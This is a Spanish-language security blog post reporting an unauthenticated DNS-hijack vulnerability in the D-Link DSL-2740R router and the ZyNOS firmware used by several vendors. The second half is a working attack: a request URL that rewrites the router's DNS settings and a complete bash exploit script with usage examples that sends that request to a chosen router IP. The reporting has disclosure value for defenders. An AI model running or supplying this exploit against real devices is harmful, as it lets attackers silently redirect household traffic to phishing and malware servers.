Tienda Wifi

Tienda Wifi
CiudadWireless es la tienda Wifi recomendada por elhacker.NET

Buscador

Entradas Mensuales

Suscripción

¿Quieres recibir las últimas novedades del blog en tu correo?

¡Suscríbete al feed!

Foro de elhacker.net - Noticias

elhacker.NET en Facebook

Entradas populares

PostHeaderIcon DNS Hijack en router ADSL de D-Link




El popular router doméstico modelo DSL2740R inalámbrico de D-Link es vulnerable a un secuestro de nombres de dominio (DNS) que no requiere autenticación para acceder a su interfaz administrativa.  La vulnerabilidad puede ser explotada remotamente. El problema también podría afectar a otros dispositivos, ya que se encuentra en un firmware popular usado por los diferentes fabricantes.





Según Todor Donev de la empresa de seguridad Ethical Hacker búlgaro, una serie de otros routers D-Link se ven afectados por este error también, particularmente la DSL-320B. PCWorld informa que la vulnerabilidad existe en una pieza de un gran despliegue de firmware del router llamado ZyNOS, que es desarrollado por ZuXEL Communications Corporation. -

La vulnerabilidad está en realidad en ZyNOS, un firmware del router desarrollado por ZyXEL Comunicaciones que se utiliza en productos de múltiples fabricantes de equipos de red, incluyendo D-Link, TP-Link Technologies y ZTE

Si la interfaz de administración del router está expuesta a  Internet el riesgo de explotación es mayor, a veces se configura de esta manera para la administración remota.

Pero incluso si es sólo accesible desde dentro de la red de área local, los hackers pueden seguir utilizando  cross-site request forgery (CSRF) para llegar a la interfaz de un router. Ataques CSRF secuestran navegadores de los usuarios para llevar a cabo acciones no autorizadas cuando visitan sitios comprometidos o hagan click en enlaces maliciosos.

El modelo ADSL DSL-2740R en cuestión ha sido descontinuado, según el sitio web de D-Link.


En marzo de 2014, la organización de investigación de seguridad de Internet Team Cymru descubrió una campaña de ataque global que comprometía más de 300.000 routers domésticos cambiando su configuración de DNS. Una vulnerabilidad diferente ZyNOS fue explotado en ese ataque y una de las técnicas utilizadas probablemente fué CSRF.

Recordemos también que la gran botnet  formada entre 250.000 y 500.000 routers domésticos fue la utilizada por el grupo Lizard Squad para dejar sin servicio a los propietarios de una Play Station 4 o una Xbox haciendo un ataque DDoS a la red PSN (PlayStation Network) y Xbobx Live el día de navidad.


http://x.x.x.x/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=a.a.a.a
 

PoC - Prueba de Concepto - proof-of-concept


#!/bin/bash
#
#  D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit
#
#  Copyright 2015 (c) Todor Donev 
#  http://www.ethical-hacker.org/
#  
#  Description:  
#  Different D-Link Routers are vulnerable to DNS change.
#  The vulnerability exist in the web interface, which is 
#  accessible without authentication. 
#
#  ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link 
#  DEVICES MAY AFFECTED.
#
#  Once modified, systems use foreign DNS servers,  which are 
#  usually set up by cybercriminals. Users with vulnerable 
#  systems or devices who try to access certain sites are 
#  instead redirected to possibly malicious sites.
#  
#  Modifying systems' DNS settings allows cybercriminals to 
#  perform malicious activities like:
#
#    o  Steering unknowing users to bad sites: 
#       These sites can be phishing pages that 
#       spoof well-known sites in order to 
#       trick users into handing out sensitive 
#       information.
#
#    o  Replacing ads on legitimate sites: 
#       Visiting certain sites can serve users 
#       with infected systems a different set 
#       of ads from those whose systems are 
#       not infected.
#   
#    o  Controlling and redirecting network traffic: 
#       Users of infected systems may not be granted 
#       access to download important OS and software 
#       updates from vendors like Microsoft and from 
#       their respective security vendors.
#
#    o  Pushing additional malware: 
#       Infected systems are more prone to other 
#       malware infections (e.g., FAKEAV infection).
#
#     
if [[ $# -gt 3 || $# -lt 2 ]]; then
        echo "     D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit"
        echo "  ================================================================"
        echo "  Usage: $0   "
        echo "  Example: $0 192.168.1.1 8.8.8.8"
        echo "  Example: $0 192.168.1.1 8.8.8.8 8.8.4.4"
        echo ""
        echo "     Copyright 2015 (c) Todor Donev "
        echo "                  http://www.ethical-hacker.org/"
        exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
        echo "  Error : libwww-perl not found =/"
        exit;
fi
        GET "http://$1/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=$2&dnsSecondary=$3" 0&> /dev/null <&1

0 comentarios :

Publicar un comentario

Los comentarios pueden ser revisados en cualquier momento por los moderadores.

Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.

Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.